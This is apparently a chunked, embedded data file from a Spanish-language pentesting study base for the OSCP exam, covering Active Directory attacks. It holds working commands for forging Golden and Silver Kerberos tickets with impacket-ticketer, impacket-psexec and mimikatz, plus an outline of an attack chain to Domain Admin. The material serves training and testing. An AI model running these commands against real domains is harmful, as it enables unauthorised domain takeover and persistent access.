-0.01288, 0.01668, 0.09775, -0.11719, 0.00068, 0.1155, -0.03277, 0.05469, 0.01752, 0.03038, 0.06854, -0.03082, 0.00694, -0.04174, -0.01372, -0.04433, -0.04461, 0.06122, 0.00219, -0.08616, -0.01757, -0.02463, 0.02978, 0.03655, -0.01528, -0.03456, 0.06097, 0.00245, -0.03449, -0.0307, -0.06787, 0.01838, 0.0215, 0.01226, -0.04715, -0.00531, 0.0475, -0.0569, -0.03959, 0.05079, 0.01209, 0.04189, -0.0405, 0.08636, -0.02101, 0.03066, -0.10734, -0.00968, -0.02437, 0.04631, 0.00126, 0.00423, 0.01094, -0.03576, -0.01233, 0.02473, -0.02656, -0.02911, 0.02014, 0.03048, 0.01686, -0.01662, -0.0318, -0.02218, -0.03626, 0.0203, -0.06991, 0.0549, 0.00608, -0.05361, -0.0066, -0.00808, -0.02985, -0.04521, -0.02576, 0.05267, -0.09946, 0.01485, -0.01192, 0.02218, 0.04075, 0.01828, 0.00241, -0.04214, -0.014, 0.03329, -0.06168, 0.00956, -0.01762, -0.04595, -0.02487, 0.00859, 0.01337, -0.02801, -0.02374, -0.02566, -0.0157, 0.03907, -0.03168, 0.01543, 0.02347, -0.02572, -0.04206, 0.02633, -0.00269, -0.00221, 0.06913, -0.0716, -0.00405, 0.10763, -0.06458, 0.04561, -0.03396, -0.00663, -0.02694, 0.00335, -0.02943, -0.01556, 0.03967, 0.01608, 0.02209, 0.01088, -0.01333, 0.03557, -0.04944, 0.05007, 0.03174, 0.01639, 0.07577, -0.00572, 0.05029, -0.02084, -0.03626, 0.05716, 0.0741, -0.00662, 0.029, 5e-05, -0.02835, 0.05443, 0.01582, -0.01069, -0.01199, 0.02388, -0.0204, -0.00633, 0.05377, 0.0272, -0.02817, -0.01018, -0.06993, 0.00555, 0.0066, -0.0471, -0.06458]} +{"tipo": "metodologia", "herramienta": "Golden Ticket", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/Golden Ticket.md", "texto": "## Forjar\n```bash\nimpacket-ticketer -nthash KRBTGT_HASH -domain-sid S-1-5-21-... -domain corp.local Administrator\nexport KRB5CCNAME=Administrator.ccache\nimpacket-psexec -k -no-pass corp.local/Administrator@dc.corp.local\n```\n```", "v": [-0.14429, -0.2456, 0.02268, -0.16467, -0.05717, -0.24889, 0.09689, 0.11454, -0.07135, 0.21622, -0.07072, -0.12334, -0.04637, -0.11938, -0.02166, -0.08902, 0.04104, -0.00841, -0.0586, 0.09541, -0.00347, 0.05429, 0.04877, 0.1707, 0.09967, 0.08139, 0.02157, 0.04861, -0.06087, 0.05869, 0.0881, -0.0699, -0.0528, 0.03741, 0.0518, -0.00858, -0.00089, 0.03392, 0.01595, 0.14963, -0.00826, -0.01937, -0.09297, 0.16684, 0.02446, -0.02481, 0.02658, -0.08143, 0.03547, -0.16846, -0.06695, -0.08692, -0.11516, 0.04588, 0.01504, 0.07197, 0.10254, -0.03644, -0.01744, 0.02038, -0.01364, -0.00028, -0.00736, 0.03784, 0.04288, 0.00522, 0.10792, -0.08479, -0.05288, -0.0049, -0.01988, -0.02175, 0.05644, -0.04548, 0.02956, 0.01138, 0.08067, -0.04532, 0.03344, -0.00519, -0.07987, 0.0206, -0.0297, 0.0505, 0.00074, -0.09377, 0.06571, -0.12412, 0.04394, 0.04109, 0.04984, -0.09257, 0.08734, -0.05878, -0.00613, -0.07794, 0.02245, -0.10644, -0.09061, -0.01114, -0.01862, 0.16022, -0.08054, 0.12846, 0.10986, -0.03327, 0.05923, -0.0022, 0.09534, 0.07142, 0.15749, -0.01234, -0.0409, 0.00928, -0.04968, 0.00324, -0.0261, 0.03235, 0.02272, 0.03915, -0.02463, -0.03206, 0.09422, -0.04658, 0.00491, -0.02886, 0.01259, 0.02258, 0.03247, -0.06911, -0.01231, -0.01295, 0.06608, -0.02151, -0.01595, 0.03734, 0.04041, 0.01874, 0.0103, 0.02019, -0.09026, -0.01969, 0.01322, 0.08853, 0.00353, -0.00112, 0.0042, -0.05752, -0.01635, 0.03353, 0.03454, -0.03444, -0.03188, -0.03336, 0.04345, 0.07202, 0.02017, -0.02461, -0.0265, -0.00412, -0.00451, 0.05631, 0.06047, 0.11659, -0.02722, 0.0544, 0.00195, -0.0044, 0.03087, 0.05816, 0.05192, -0.0046, -0.00558, 0.02645, 0.03067, -0.05358, 0.07651, -0.04899, 0.03076, -0.01085, 0.12391, -0.02877, -0.00233, 0.08804, -0.00502, -0.00812, -0.00149, -0.02275, 0.00234, -0.04139, 0.02153, 0.03244, -0.02466, -0.02918, -0.03788, 0.04597, 0.01618, -0.08061, 0.004, 0.01002, -0.04675, -0.01742, -0.01821, -0.037, -0.03371, 0.0057, 0.00325, -0.02932, 0.00626, 0.01399, -0.02229, 0.01851, -0.02926, 0.01368, -0.07363, -0.06092, -0.06621, 0.00352, -0.03699, -0.01548, -0.08458, 0.04597, 0.04899, -0.00267, 0.08073, -0.00113, 0.00347, 0.00026, 0.05573, -0.00919, -0.04344, 0.01907, 0.00145, 0.00956, -0.02625, -0.03187, 0.02756, 0.05342, -0.00247, 0.02409, -0.04441, -0.02519, -0.04084, -0.00118, -0.07706, 0.0128, 0.00369, 0.01894, -0.01433, 0.02968, -0.00425, -0.06965, -0.02036, -0.03042, -0.00447, 0.04409]} +{"tipo": "metodologia", "herramienta": "Golden Ticket", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/Golden Ticket.md", "texto": "# mimikatz equivalente:\nkerberos::golden /user:Administrator /domain:corp.local /sid:S-... /krbtgt:HASH /ptt\n```", "v": [0.16638, -0.23306, 0.01086, -0.07157, -0.00996, -0.24605, -0.09712, 0.06272, -0.07803, 0.16211, -0.04798, 0.00388, 0.08937, -0.0403, 0.04037, -0.09554, 0.08112, -0.02837, -0.04372, 0.08685, 0.09501, 0.09487, 0.12961, 0.02769, 0.04485, -0.0194, 0.08052, 0.0346, -0.07851, 0.07486, 0.05439, -0.03968, -0.15991, 2e-05, -0.13538, -0.00072, -0.03084, 0.0562, 0.08255, 0.22519, -0.02918, -0.01292, -0.00254, 0.1702, 0.07708, 0.03377, -0.04011, -0.0614, -0.04555, -0.04151, -0.0692, -0.02149, -0.09958, 0.05835, 0.02175, -0.0068, 0.09351, -0.13264, -0.00069, -0.03362, -0.02186, 0.0025, -0.13781, -0.00389, -0.01749, -0.02561, 0.0978, -0.05546, -0.0287, 0.08679, -0.0343, -0.01889, 0.00491, -0.07514, 0.09209, -0.04944, 0.04592, -0.01803, 0.01754, -0.0276, -0.06811, -0.04399, -0.0036, 0.00207, -0.0225, -0.13793, 0.07595, -0.06864, -0.0137, -0.00642, 0.08595, -0.05491, 0.07449, -0.11, -0.06586, -0.11251, -0.10852, -0.01182, -0.01618, 0.04384, 0.03298, 0.13439, -0.08787, 0.07328, 0.04072, 0.01078, 0.04979, -0.01627, 0.08911, 0.01113, 0.075, -0.051, -0.06095, -0.04655, -0.02104, 0.0967, -0.04043, -0.04802, 0.07284, -0.03816, -0.0072, -0.02371, 0.0577, -0.01794, -0.02055, -0.02091, 0.03564, -0.05334, -0.03625, -0.00335, -0.03161, 0.03207, 0.15556, -0.04346, 0.03322, 0.05263, 0.03463, -0.00759, 0.00433, -0.01594, -0.07532, -0.02833, 0.0216, -0.00073, 0.01617, -0.05531, 0.02809, -0.14237, 0.03757, -0.00253, -0.00114, 0.00544, -0.00584, -0.02951, 0.07306, 0.04106, 0.00368, 0.01351, -0.05801, -0.00515, 0.04613, 0.03882, 0.13123, 0.07219, -0.03372, 0.01899, -0.02369, -0.04784, 0.01826, -0.04464, 0.08779, -0.0102, 0.02307, 0.06536, 0.02664, -0.0219, 0.0787, 0.02517, -0.02152, 0.02429, 0.10807, -0.00853, 0.01447, 0.07063, 0.00845, -0.04305, 0.02668, 0.05432, -0.02487, -0.01671, 0.01801, -0.02422, -0.04632, 0.053, 0.00267, -0.0022, 0.03783, -0.06372, -0.02141, -0.01333, -0.03123, 0.02898, -0.02987, 0.0316, -0.06738, -0.00222, 0.06557, 0.0258, -0.02101, -0.04353, 0.00827, -0.00575, 0.03747, 0.01694, 0.01213, 0.01451, -0.07444, 0.0253, -0.04522, -0.01905, -0.077, 0.02766, 0.00548, 0.00401, -0.01024, 0.02593, 0.01403, -0.00215, 0.02998, 0.01027, -0.02854, -0.00103, 0.04402, 0.02299, -0.0157, -0.03638, 0.00033, 0.02134, 0.02614, -0.02671, -0.07578, -0.02184, 0.00884, 0.04603, -0.04504, -0.00043, -0.03813, 0.02226, -0.00328, 0.03973, 0.07162, -0.15178, -0.05051, -0.02916, -0.0434, 0.02606]} +{"tipo": "metodologia", "herramienta": "Golden Ticket", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/Golden Ticket.md", "texto": "## Concepto\nkrbtgt firma **todos** los TGT (Kerberos). Si controlas su hash, firmas tickets válidos a voluntad → persistencia total.\n\nRelacionado: Silver Ticket · DCSync · Pass-the-Hash · OSCP MOC", "v": [-0.06384, -0.16998, -0.08173, -0.16078, 0.09761, -0.37076, -0.09815, 0.14587, 0.00124, 0.15228, -0.05216, -0.08511, 0.09747, -0.07133, 0.07238, 0.06593, 0.03114, -0.04218, -0.08591, -0.01367, 0.10013, -0.03591, -0.03179, -0.08098, 0.06234, 0.00057, -0.0323, 0.04384, -0.13988, 0.03258, 0.06504, -0.11439, 0.06704, 0.09739, 0.01173, -0.01786, -0.18774, 0.12138, 0.13461, 0.05556, -0.02048, 0.05815, 0.00165, 0.12075, 0.05777, -0.15318, 0.03845, 0.02573, -0.06287, -0.08003, -0.03947, -0.0231, -0.26877, 0.06979, -0.02327, -0.02413, -0.01185, 0.05596, -0.03909, 0.03423, -0.03744, -0.02634, -0.07441, 0.00284, 0.00082, 0.00989, -0.06258, -0.04951, -0.03852, 0.02378, -0.12134, 0.13819, -0.03527, -0.026, 0.13531, -0.01329, 0.12657, -0.06889, 0.09902, 0.07601, 0.00531, -0.03047, -0.06622, -0.04822, 0.01596, -0.03128, 0.04988, -0.06975, -0.04759, -0.01157, 0.11051, 0.07907, 0.06226, -0.00123, 0.01664, -0.09588, -0.07973, 0.02757, -0.02708, 0.02993, -0.0712, 0.05849, -0.02457, -0.00011, -0.01275, -0.00364, 0.09186, 0.01377, 0.09646, 0.07201, 0.03057, 0.00573, -0.01004, 0.00579, 0.02848, 0.00994, 0.06172, -0.04703, 0.04753, 0.04945, -0.0341, 0.04401, 0.03055, -0.08565, 0.05373, 0.00854, 0.00546, 0.08545, -0.02341, -0.03587, -0.00875, 0.02039, -0.04496, -0.03784, 0.00942, 0.0012, -0.00846, 0.08077, 0.01445, -0.00208, -0.01295, 0.07023, -0.00059, 0.01118, 0.08952, -0.01908, -0.04003, 0.04325, 0.01491, 0.04392, 0.00813, 0.0152, -0.03651, 0.02243, 0.04172, 0.01764, -0.03458, -0.0364, -0.03609, 0.09621, 0.03833, -0.01372, -0.02994, 0.04349, -0.00418, 0.02321, -0.03581, -0.01342, -0.04033, 0.01289, 0.01681, -0.04657, -0.0143, 0.0741, 0.00599, -0.08353, 0.06093, -0.05651, 0.00332, -0.06679, 0.03914, -0.04248, 0.022, 0.05858, -0.01332, 0.02293, 0.08365, -0.02072, 0.09083, -0.0237, 0.01744, -0.00403, 0.0051, -0.00694, -0.02478, -0.00434, 0.02328, -0.06748, -0.02502, -0.00944, -0.0339, -0.00885, -0.00546, -0.00125, 0.02793, -0.03028, -0.00873, 0.05399, -0.02098, 0.02182, 0.05112, -0.02646, 0.05631, -0.03218, -0.02949, 0.0028, -0.01977, -0.01853, 0.07486, 0.03511, -0.00531, -0.00966, 0.02915, 0.00373, -0.00237, -0.04097, 0.05741, 0.00516, 0.01917, 0.02763, 0.05598, 0.01821, 0.01216, -0.0141, 0.01411, 0.01163, -0.02627, 0.01093, -0.03646, -0.01467, 0.02724, 0.01122, -0.01812, 0.03647, -0.05263, -0.03038, -0.02387, -0.00632, 0.03268, -0.02616, 0.00429, -0.00946, -0.01402, -0.04658, -0.00726, -0.01949]} +{"tipo": "metodologia", "herramienta": "Silver Ticket", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/Silver Ticket.md", "texto": "# Silver Ticket\n\n> Forjas un **TGS** para **un servicio concreto** usando el hash NTLM de **esa cuenta de servicio** (no del krbtgt). Más sigiloso que el Golden Ticket: **no habla con el DC**. Fuente: oscp.trastero.org/activedirectory.", "v": [-0.06501, -0.25455, -0.10624, -0.04324, -0.00253, -0.20865, -0.10617, 0.07778, 0.02052, 0.15175, -0.16289, -0.09743, 0.02245, -0.0291, 0.01298, -0.08426, -0.00181, -0.12168, 0.01128, 0.03396, 0.00932, 0.02241, -0.00113, -0.17467, 0.0752, -0.00748, -0.01037, -0.05879, -0.17396, 0.11391, 0.07613, -0.16024, -0.06751, -0.07785, 0.01402, -0.09275, -0.08939, 0.15805, 0.12712, 0.05503, 0.05199, 0.03698, 0.01217, 0.20533, 0.0781, -0.12083, 0.0129, -0.03314, -0.06789, -0.09818, -0.02631, -0.0465, -0.19991, -0.03311, -0.09008, 0.01934, -0.01965, -0.02887, -0.0122, -0.01085, 0.03874, -0.06542, -0.06815, -0.07863, -0.05194, 0.02314, 0.00627, -0.0304, -0.04675, -0.06732, -0.12532, 0.06516, 0.00164, -0.00056, 0.08325, -0.09955, 0.1022, -0.06795, 0.05176, 0.08467, -0.00919, -0.0575, -0.02699, -0.0292, -0.04811, -0.04268, 0.08099, -0.02614, -0.05007, 0.00331, 0.07177, 0.09928, -0.0551, 0.03156, 0.04121, -0.08245, -0.05106, -0.01004, 0.0596, 0.00143, 0.09399, 0.0583, 0.00188, 0.03279, -0.00434, 0.04458, 0.10065, -0.05982, 0.01536, 0.01704, -0.00874, 0.0149, 0.01026, -0.01674, 0.02885, 0.02301, 0.0341, -0.03154, 0.10502, 0.00175, 0.00721, -0.029, 0.02943, -0.00903, 0.02187, 0.02835, -0.04027, 0.00191, 0.0303, 0.03501, -0.03083, -0.00708, -0.02328, -0.01249, -0.00588, -0.00506, 0.04346, -0.00396, 0.0434, -0.00391, 0.07923, 0.02952, 0.01062, -0.00745, 0.09974, -0.0523, 0.04029, -0.00222, -0.0148, 0.03609, 0.0673, 0.03605, 0.0242, 0.08628, -0.00562, -0.07296, 0.00154, -0.07115, -0.11559, 0.0676, -0.00843, 0.028, 0.06339, 0.065, -0.05272, -0.02952, 0.00255, -0.04551, -0.00149, -0.04182, 0.01421, -0.02088, -0.0174, -0.00664, 0.00122, -0.06483, 0.038, -0.08967, 0.03927, -0.06766, 0.08741, -0.02901, 0.01016, 0.00515, -0.04896, 0.04179, 0.03486, -0.07026, 0.02897, -0.01262, -0.02787, -0.00893, 0.02053, 0.0415, -0.01921, -0.02399, -0.00371, -0.09113, 0.01908, -0.09319, -0.11923, 0.0588, 0.00089, 0.01096, -0.01233, -0.02608, 0.02675, 0.06313, -0.08356, 0.03634, 0.05115, -0.03909, 0.11134, -0.05891, -0.04255, 0.03895, -0.01745, 0.0038, -0.00779, 0.05146, -0.031, 0.01756, 0.00864, 0.01702, 0.01741, -0.07358, 0.02798, -0.02461, 0.06703, 0.04781, 0.03958, 0.00759, 0.00583, -0.04675, 0.0415, 0.00206, -0.0026, 0.02838, -0.05194, -0.0298, 0.02915, 0.05778, -0.07617, 0.02927, -0.01279, -0.01649, -0.03475, 0.05519, -0.00113, -0.03288, 0.00576, -0.03938, -0.00326, -0.06756, -0.00482, -0.01629]} +{"tipo": "metodologia", "herramienta": "Silver Ticket", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/Silver Ticket.md", "texto": "## Golden vs Silver\n```\nGolden Ticket → hash de krbtgt → TGT → CUALQUIER servicio del dominio (todopoderoso)\nSilver Ticket → hash del servicio (ej. cuenta del SQL/CIFS) → TGS → SOLO ese servicio\n```\nEl Silver no toca el KDC → casi indetectable, pero limitado al servicio.", "v": [-0.20969, -0.30392, -0.04185, 0.03824, -0.05734, -0.29656, -0.04723, 0.01354, 0.0389, 0.13525, -0.19801, -0.06619, -0.00547, -0.06498, 0.10927, 0.02135, 0.09608, -0.14444, 0.05098, 0.04841, 0.03218, 0.10074, 0.04684, -0.12238, 0.12698, -0.01836, 0.00216, 0.00979, -0.12246, 0.07124, 0.10848, -0.15812, -0.0853, -0.07447, -0.02745, -0.04433, -0.03658, 0.1641, 0.0473, 0.00336, 0.08226, -0.04424, -0.04051, 0.06, 0.07103, -0.16886, 0.04056, -0.00662, -0.03314, -0.00983, 0.01493, -0.06356, -0.20241, -0.08889, -0.02971, 0.01521, -0.00224, -0.00973, -0.07202, 0.00427, -0.02078, -0.06576, -0.09055, 0.00423, -0.00292, -0.01676, -0.00575, 0.02825, 0.03099, 0.02474, -0.11007, 0.05787, 0.01044, -0.06509, 0.04827, -0.07364, 0.10074, -0.00539, 0.11211, 0.05379, -0.03361, 0.02735, -0.02902, 0.04274, -0.04363, -0.00409, 0.08894, -0.0897, -0.06044, 0.03738, 0.04889, 0.05855, -0.02619, 0.05563, 0.00249, -0.08212, -0.04045, -0.00666, -0.01584, 0.02448, 0.09854, 0.05576, -0.03507, 0.06686, -0.00332, 0.10193, 0.09719, -0.09131, 0.01813, -0.04397, 0.00586, -0.01226, 0.03411, -0.03332, -0.0066, 0.05604, 0.01862, -0.04707, 0.0557, 0.0283, 0.02143, -0.03992, 0.07274, -0.07046, 0.05167, -0.00154, -0.02181, -0.05914, 0.01168, -0.02176, -0.01643, 0.07358, -0.07082, 0.00013, 0.01622, -0.00299, 0.01267, -0.00318, 0.03673, 0.00579, 0.05757, 0.03347, -0.01215, -0.01997, 0.08514, -0.03791, 0.0416, -0.04749, -0.02517, 0.00197, 0.01212, -0.01748, -0.03608, 0.05063, -0.01504, -0.04042, -0.03953, -0.03736, -0.04841, 0.03327, -0.01317, 0.06011, 0.03502, 0.02859, -0.02856, 0.02748, 0.0545, -0.00297, 0.02485, -0.04418, -0.02314, -0.01842, -0.01412, -0.01379, -0.01622, -0.04019, -0.00358, -0.04234, 0.06038, -0.03079, 0.05454, -0.05573, -0.0081, 0.0618, -0.03782, 0.01214, 0.02137, -0.02472, 0.03596, -0.06881, 0.00984, -0.00702, -0.00427, -0.02154, 0.04186, -0.07273, 0.03765, -0.05915, 0.01465, -0.08466, -0.06933, -0.00925, -0.04636, 0.01292, 0.04435, 0.00849, 0.06196, 0.06851, -0.05193, 0.05439, -0.0171, -0.01217, 0.0832, -0.05994, -0.02426, -0.00526, -0.02395, -0.01206, -0.01785, 0.01306, -0.00885, 0.02008, 0.00579, 0.006, -0.02783, -0.01189, 0.04429, -0.01514, 0.10615, 0.05365, 0.02144, 0.00432, -0.04429, 0.05192, 0.05566, 0.01634, 0.01423, -0.01181, -0.05141, -0.01256, 0.03145, 0.06487, -0.01684, 0.08994, 0.01975, -0.05908, -0.02809, 0.02956, 0.01384, -0.01416, 0.05273, 0.0109, -0.0299, -0.05946, -0.03036, 0.013]} +{"tipo": "metodologia", "herramienta": "Silver Ticket", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/Silver Ticket.md", "texto": "## Forjar\n```bash\nimpacket-ticketer -nthash -domain-sid S-1-5-21-... \\\n -domain corp.local -spn cifs/server.corp.local Administrator\nexport KRB5CCNAME=Administrator.ccache\nimpacket-psexec -k -no-pass corp.local/Administrator@server.corp.local\n```\n- El hash del servicio sale de Mimikatz / secretsdump (la cuenta de máquina o de servicio).\n- `-spn` define a qué servicio aplica (`cifs/`, `mssql/`, `http/`, `host/`...).\n\nRelacionado: Golden Ticket · Kerberos · Pass-the-Hash · OSCP MOC", "v": [-0.09046, -0.2433, -0.00255, -0.14247, -0.0814, -0.37593, -0.04259, 0.02442, -0.09425, 0.15361, -0.13839, -0.0904, 0.01195, -0.10934, 0.05681, -0.04029, 0.10985, -0.03395, -0.00088, 0.13415, 0.01777, 0.10575, -0.03878, 0.08579, 0.0229, 0.10374, 0.07397, -0.02303, -0.15706, 0.01074, 0.09654, -0.12762, -0.09429, 0.03465, 0.01887, -0.02329, -0.03556, 0.04787, 0.01374, 0.13194, -0.00811, -0.01224, -0.08319, 0.13871, 0.06407, -0.10457, 0.05258, -0.04523, 0.04239, -0.0577, -0.06144, -0.12711, -0.16852, 0.01117, -0.01693, 0.05495, 0.03444, -0.00165, -0.05461, 0.04458, -0.03781, -0.03209, -0.0726, 0.01117, 0.11554, -0.02977, 0.03436, -0.04669, -0.03223, 0.00731, -0.06948, 0.03139, 0.03825, -0.06462, 0.08046, -0.01838, 0.09339, -0.07461, 0.08331, 0.01563, -0.06015, 0.01941, -0.04831, 0.08028, -0.00971, -0.06372, 0.05978, -0.08891, 0.03691, 0.03641, 0.09255, 0.00703, 0.04957, -0.00823, -0.01742, -0.0808, -0.00529, -0.09486, -0.04609, -0.00226, 0.02222, 0.15044, -0.09582, 0.13568, 0.08106, 0.00217, 0.09071, 0.00052, 0.05934, 0.02466, 0.15565, -0.03887, -0.02729, -0.03923, -0.04899, -0.0349, 0.00023, 0.04508, 0.04817, 0.06701, -0.07134, -0.035, 0.13201, -0.0392, -0.01619, -0.03678, -0.00559, 0.02565, 0.0286, -0.06316, -0.02873, 0.00741, 0.00314, -0.01323, 0.0146, -0.01907, 0.06928, -0.0199, 0.04367, 0.00577, -0.04528, -0.01656, -0.0244, 0.09154, 0.06882, -0.00285, 0.03157, -0.06902, -0.02514, 0.02221, 0.03263, -0.0332, -0.04743, 0.0009, 0.01125, 0.02725, 0.0084, -0.05957, -0.05603, 0.03009, 0.02092, 0.03434, 0.046, 0.09242, -0.02411, 0.04613, 0.01055, 0.01258, 0.03515, -0.00584, 0.01974, -0.01764, -0.03526, -0.0062, 0.02697, -0.04106, 0.03984, -0.04852, 0.03065, -0.00549, 0.10533, -0.04763, -0.0107, 0.0724, -0.02889, -0.00546, -0.00434, -0.02666, -0.01044, -0.05495, 0.01378, -0.01794, -0.02525, -0.00403, -0.01524, 0.00486, 0.00371, -0.07825, 0.00446, -0.0235, -0.06269, -0.00387, -0.03018, -0.0024, -0.02577, -0.0017, 0.01744, 0.00512, -0.02039, 0.0084, -0.00788, -0.00123, 0.02757, -0.00024, -0.0669, -0.04985, -0.03972, -0.01578, -0.0144, 0.00396, -0.06982, 0.0203, 0.03311, 0.01182, 0.05457, -0.00032, 0.04286, 0.00618, 0.08297, 0.00575, -0.03155, 0.00382, -0.00456, 0.00789, 0.01072, -0.04505, 0.02231, 0.00532, -0.04212, -0.01625, -0.01643, 0.02033, -0.03728, -0.00848, -0.03531, 0.0115, -0.01411, -0.00238, -0.02216, 0.01658, 0.00313, -0.05615, -0.01179, -0.05948, 0.01664, 0.03957]} +{"tipo": "metodologia", "herramienta": "Active Directory", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/Active Directory.md", "texto": "# Active Directory (índice)\n\n> El **set de AD = 40 puntos** del examen (3 máquinas encadenadas). Ver Estructura del examen.\n> Idea clave: tu Kali no tiene GUI central; cada tool (Impacket, Mimikatz, BloodHound) habla por red con la víctima. Ver Puesto de mando Kali.", "v": [-0.30411, -0.08315, -0.08355, -0.11298, -0.02614, -0.06965, -0.09959, 0.06081, -0.10672, -0.06548, -0.06962, -0.1666, -0.10928, -0.03545, 0.15171, 0.1147, 0.07774, -0.17624, 0.06338, -0.10692, 0.01532, -0.01964, -0.0717, 0.06268, -0.00033, 0.20202, -0.05918, 0.10743, -0.0197, -0.00677, -0.05313, -0.01368, -0.0227, -0.10425, -0.0604, -0.13284, -0.00704, 0.08363, 0.07108, 0.16681, -0.05961, 0.13139, -0.09327, -0.06636, 0.13012, -0.0868, 0.13008, 0.03608, 0.03943, 0.05911, -0.04045, -0.08481, -0.03657, -0.09386, 0.00699, -0.08399, 0.06685, 0.10913, -0.03272, -0.07524, 0.06713, -0.05532, -0.04668, 0.01708, 0.02341, 0.01337, 0.0632, -0.01878, -0.05544, 0.0734, 0.00528, -0.04824, -0.04243, -0.07697, -0.02667, -0.15746, 0.0469, -0.02747, 0.05456, 0.04109, -0.00809, -0.03037, -0.03948, -0.05527, -0.03616, -0.07643, 0.05714, -0.11744, -0.04928, -0.01529, 0.09804, -0.0308, 0.04824, 0.0514, 0.00772, -0.03504, 0.01099, -0.00424, 0.06045, -0.05299, 0.14149, -0.02448, -0.07596, 0.08722, 0.03755, 0.02209, -0.02811, 0.05026, -0.02127, -0.02986, 0.04035, 0.04234, 0.02817, -0.07339, -0.00654, -0.01884, 0.07377, 0.0606, 0.06859, -0.00945, 0.09556, 0.05786, 0.08622, 0.02105, -0.08573, -0.0897, -0.06304, -0.02762, 0.0937, -0.01388, 0.03418, 0.05383, 0.00577, -0.07341, 0.0683, 0.01329, 0.02238, -0.01982, 0.01777, -0.01709, -0.02759, 0.01664, -0.0264, -0.03232, -0.01205, 0.01427, 0.07505, -0.06962, -0.01653, 0.04962, -0.02605, -0.02555, 0.07851, 0.04771, -0.0113, 0.01243, 0.00762, 0.00686, -0.0236, 0.00607, -0.0103, -0.00088, -0.06787, 0.08034, -0.01204, 0.11703, -0.01045, 0.00643, 0.03506, -0.02734, 0.03774, 0.00776, -0.00949, 0.00327, 0.01901, -0.08912, 0.05858, -0.04821, -0.02604, -0.04635, -0.01048, -0.00779, -0.06024, 0.01471, 0.04482, 0.04197, -0.00323, -0.03072, 0.08749, -0.03195, 0.04007, 0.00613, -0.04353, -0.05137, 0.08577, 0.02348, 0.01659, -0.04254, -0.02811, -0.09069, -0.04372, 0.0587, -0.01618, -0.04344, 0.01901, 0.01927, -0.03192, 0.01297, 0.011, 0.08249, -0.01889, 0.01887, 0.03288, -0.01965, 0.00179, -0.06128, -0.01769, 0.03557, 0.009, -0.015, -0.00784, 0.02976, 0.00939, 0.0529, -0.04442, 0.01863, 0.00954, -0.02488, 0.09555, -0.00365, 0.00709, 0.03119, 0.06416, -0.00378, 0.01421, -0.00916, 0.04278, 0.02171, -0.03292, -0.05974, 0.01451, 0.0284, -0.02134, -0.07306, -0.02504, 0.01231, 0.03267, -0.03016, -0.02946, -0.03427, -0.01761, 0.00806, -0.01454, -0.066, -0.01019, -0.04606]} +{"tipo": "metodologia", "herramienta": "Active Directory", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/Active Directory.md", "texto": "## La cadena de ataque típica\n```\n1) RCE en web → Reverse shell en USER1\n2) PEASS-ng → privesc → SYSTEM en USER1 (Privesc Windows / Potato attacks)\n3) Mimikatz → hash NTLM de un usuario de dominio\n4) BloodHound → ¿camino a Domain Admin?\n5) Pass-the-Hash / Impacket → shell en SERVER2 (Movimiento lateral)\n6) si SERVER2 = DC → secretsdump → toda la BD del dominio\n7) hash de krbtgt → Golden Ticket → dios\n```", "v": [-0.22237, -0.2771, -0.07969, -0.11802, -0.08561, -0.03946, -0.08668, -0.05376, 0.01523, 0.1211, -0.01804, -0.0369, -0.07826, -0.26582, 0.027, 0.00588, 0.01009, -0.05158, -0.01322, 0.00192, 0.01766, 0.02369, -0.0994, -0.01818, 0.08996, 0.06126, -0.02788, 0.08426, -0.10127, 0.03493, 0.00799, -0.076, -0.0986, 0.00609, -0.05702, -0.12379, -0.05135, 0.04231, 0.1369, 0.20445, 0.08504, 0.08662, -0.10562, 0.16727, 0.04577, -0.0444, 0.03057, -0.07683, 0.03265, -0.14006, -0.03103, -0.00394, -0.25558, -0.0846, 0.03933, -0.04983, 0.0507, -0.0308, -0.0918, -0.0336, -0.01612, -0.02989, -0.00498, -0.0631, -0.00237, -0.04778, -0.06752, -0.00821, -0.02289, 0.06645, 0.00316, 0.05168, 0.055, -0.03295, 0.0473, 0.01515, 0.09649, 0.00831, 0.15714, 0.07851, -0.04744, 0.01663, -0.00599, -0.03484, -0.06766, -0.07868, 0.0432, -0.16205, -0.03966, 0.00401, 0.15629, -0.007, -0.00244, 0.05703, -0.00067, -0.05271, -0.01252, -0.0608, -0.09937, -0.06825, 0.0361, 0.10716, -0.09614, 0.07359, 0.05606, 0.0388, 0.03752, -0.08317, 0.09031, -0.02183, 0.06503, -0.00613, -0.06154, -0.05873, -0.05758, 0.06761, 0.04024, 0.00485, 0.0434, 0.00441, -0.04202, -0.02604, 0.0282, 0.00493, -0.00048, -0.03128, -0.04378, 0.00736, -0.03688, -0.05553, -0.00669, 0.00678, -0.01101, 0.04276, -0.0062, 0.09622, 0.00911, 0.00124, -0.03541, -0.01244, 0.00882, 0.023, -0.06654, 0.03759, 0.08626, -0.04884, 0.05312, -0.08027, -0.03681, -0.02118, -0.06535, 0.01832, 0.01845, -0.04145, 0.00832, 0.02867, -0.04383, -0.01782, -0.01683, 0.06105, 0.01302, 0.07737, -0.03285, 0.02112, -0.02903, -0.05184, 0.0349, 0.01405, -0.00955, -0.03923, 0.01925, 0.00095, -0.05037, -0.01652, 0.01343, -0.04765, 0.04458, -0.05976, -0.02428, 0.01324, -0.01817, -0.06955, -0.02427, 0.08051, -0.00656, 0.00276, 0.0411, -0.00369, 0.03228, -0.00257, 0.02553, 0.03368, 0.02282, 0.02412, 0.02121, -0.02447, 0.04407, -0.08458, 0.01776, -0.04559, -0.00632, -0.00621, -0.05442, -0.01758, 0.01343, 0.02631, 0.02252, -0.0322, -0.03946, -0.00557, 0.0054, -0.01784, 0.08565, -0.01969, -0.03008, -0.00852, 0.01038, 0.0252, -0.03065, -0.01576, -0.01972, 0.06053, 0.03075, -0.00029, -0.01809, 0.02185, 0.00599, -0.0439, 0.02316, 0.01026, -0.01409, 0.03842, 0.03493, 0.00276, -0.02823, -0.03288, -0.00614, -0.00793, -0.05038, 0.03193, -0.01261, 0.00129, 0.07558, -0.02447, -0.01603, -0.06064, 